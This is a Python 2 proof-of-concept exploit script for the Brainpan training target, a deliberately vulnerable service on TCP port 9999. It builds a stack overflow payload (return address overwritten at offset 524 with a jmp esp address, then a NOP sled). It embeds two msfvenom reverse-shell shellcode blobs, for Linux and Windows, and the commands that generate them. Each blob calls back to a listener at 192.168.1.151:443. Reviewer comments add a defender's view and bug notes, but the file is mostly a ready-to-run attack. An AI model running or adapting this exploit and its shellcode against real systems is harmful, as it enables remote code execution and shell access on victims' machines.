brainpan_bof_exploit.py
#!/usr/bin/python
# Proof-of-concept for the Brainpan training target: builds one fixed-size
# (1000-byte) message and sends it to TCP port 9999 on the host given as
# argv[1]; argv[2] selects which of the two embedded payloads is placed in it.
# Python 2 only (print statements, str used as a byte buffer).
#
# Defender's view: the message has a rigid shape -- 524 bytes of 0x41, the
# same 4-byte little-endian address every time, a run of 0x90, then the
# payload and 0x43 padding -- so the traffic is easy to recognise on the wire.
# The hard-coded address from the banner only works if brainpan.exe loads at
# a fixed base (no randomisation for that module) -- TODO confirm.
print """
###################################################
# Exploit for the Brainpan Challange #
# Author: Bengman #
# #
# RET overwrite at offset 524 in our buffer #
# Badchars: \\x00 #
# jmp esp in brainpan.exe at 0x311712f3 #
###################################################
"""
import socket
import sys
import struct

# Positional arguments: host to connect to and the payload selector.
# A missing argument raises IndexError, which is reported as a usage line.
try:
    victim = sys.argv[1]
    target = sys.argv[2]
except IndexError:
    print "[+] Usage %s <host> <target>(Win7|Linux)" % sys.argv[0]
    sys.exit()

# Encoded payload produced by the command below; the listener address and
# port named there are baked into these bytes, so the blob is tied to that
# one listener. The encoder was told to avoid 0x00, the only bad character
# listed in the banner.
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.151 LPORT=443 -b "\x00" -f c
# Payload size: 95 bytes
shellcode = ("\xdb\xd3\xd9\x74\x24\xf4\x58\xbb\xa3\x10\x7f\xb1\x31\xc9\xb1"
"\x12\x31\x58\x17\x03\x58\x17\x83\x4b\xec\x9d\x44\xba\xd6\x95"
"\x44\xef\xab\x0a\xe1\x0d\xa5\x4c\x45\x77\x78\x0e\x35\x2e\x32"
"\x30\xf7\x50\x7b\x36\xfe\x38\xbc\x60\x01\x2f\x54\x73\x02\x4e"
"\x1e\xfa\xe3\xe0\x06\xad\xb2\x53\x74\x4e\xbc\xb2\xb7\xd1\xec"
"\x5c\x26\xfd\x63\xf4\xde\x2e\xab\x66\x76\xb8\x50\x34\xdb\x33"
"\x77\x08\xd0\x8e\xf8")

# Same generation procedure as above for the Windows selector; same caveats.
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.151 LPORT=443 -b "\x00" -f c
# Payload size: 351 bytes
shellcode_win32 = ("\xdb\xc8\xb8\x45\x28\x36\x37\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x31\x42\x17\x03\x42\x17\x83\xaf\xd4\xd4\xc2\xd3\xcd\x9b"
"\x2d\x2b\x0e\xfc\xa4\xce\x3f\x3c\xd2\x9b\x10\x8c\x90\xc9\x9c"
"\x67\xf4\xf9\x17\x05\xd1\x0e\x9f\xa0\x07\x21\x20\x98\x74\x20"
"\xa2\xe3\xa8\x82\x9b\x2b\xbd\xc3\xdc\x56\x4c\x91\xb5\x1d\xe3"
"\x05\xb1\x68\x38\xae\x89\x7d\x38\x53\x59\x7f\x69\xc2\xd1\x26"
"\xa9\xe5\x36\x53\xe0\xfd\x5b\x5e\xba\x76\xaf\x14\x3d\x5e\xe1"
"\xd5\x92\x9f\xcd\x27\xea\xd8\xea\xd7\x99\x10\x09\x65\x9a\xe7"
"\x73\xb1\x2f\xf3\xd4\x32\x97\xdf\xe5\x97\x4e\x94\xea\x5c\x04"
"\xf2\xee\x63\xc9\x89\x0b\xef\xec\x5d\x9a\xab\xca\x79\xc6\x68"
"\x72\xd8\xa2\xdf\x8b\x3a\x0d\xbf\x29\x31\xa0\xd4\x43\x18\xad"
"\x19\x6e\xa2\x2d\x36\xf9\xd1\x1f\x99\x51\x7d\x2c\x52\x7c\x7a"
"\x53\x49\x38\x14\xaa\x72\x39\x3d\x69\x26\x69\x55\x58\x47\xe2"
"\xa5\x65\x92\xa5\xf5\xc9\x4d\x06\xa5\xa9\x3d\xee\xaf\x25\x61"
"\x0e\xd0\xef\x0a\xa5\x2b\x78\xf5\x92\x32\xef\x9d\xe0\x34\x0e"
"\xe5\x6c\xd2\x7a\x09\x39\x4d\x13\xb0\x60\x05\x82\x3d\xbf\x60"
"\x84\xb6\x4c\x95\x4b\x3f\x38\x85\x3c\xcf\x77\xf7\xeb\xd0\xad"
"\x9f\x70\x42\x2a\x5f\xfe\x7f\xe5\x08\x57\xb1\xfc\xdc\x45\xe8"
"\x56\xc2\x97\x6c\x90\x46\x4c\x4d\x1f\x47\x01\xe9\x3b\x57\xdf"
"\xf2\x07\x03\x8f\xa4\xd1\xfd\x69\x1f\x90\x57\x20\xcc\x7a\x3f"
"\xb5\x3e\xbd\x39\xba\x6a\x4b\xa5\x0b\xc3\x0a\xda\xa4\x83\x9a"
"\xa3\xd8\x33\x64\x7e\x59\x43\x2f\x22\xc8\xcc\xf6\xb7\x48\x91"
"\x08\x62\x8e\xac\x8a\x86\x6f\x4b\x92\xe3\x6a\x17\x14\x18\x07"
"\x08\xf1\x1e\xb4\x29\xd0")

# Message layout (exactly 1000 bytes; the last term does the arithmetic):
# 524 filler bytes up to the saved return address named in the banner, the
# 4-byte address packed little-endian, 25 bytes of 0x90, the selected
# payload, then 0x43 filler. `buffer` is assigned only for these two
# selector values; any other value leaves the name referring to the Python 2
# builtin `buffer`, and the send below fails with a type error instead of a
# clear usage message.
if target == "Win7":
    buffer = "\x41" * 524 + struct.pack('<L', 0x311712f3) + "\x90" * 25 + shellcode_win32 + "\x43" * (1000-524-4-25-len(shellcode_win32))
elif target == "Linux":
    buffer = "\x41" * 524 + struct.pack('<L', 0x311712f3) + "\x90" * 25 + shellcode + "\x43" * (1000-524-4-25-len(shellcode))

# One TCP connection: read and discard up to 1024 bytes from the service,
# then hand the whole message to a single send(). send() may transmit fewer
# bytes than given and its return value is not checked here.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "[+] Connecting to " + str(victim)
    s.connect((victim, 9999))
    s.recv(1024)
    print "[+] Sending payload"
    s.send(buffer)
except:
    # NOTE(review): the bare except also swallows KeyboardInterrupt and the
    # failure caused by an unset `buffer`, so every problem is reported as a
    # connection error. The socket is never closed explicitly; the process
    # exits right after, so the OS reclaims it.
    print "Unable to connecto to target..."
    sys.exit(0)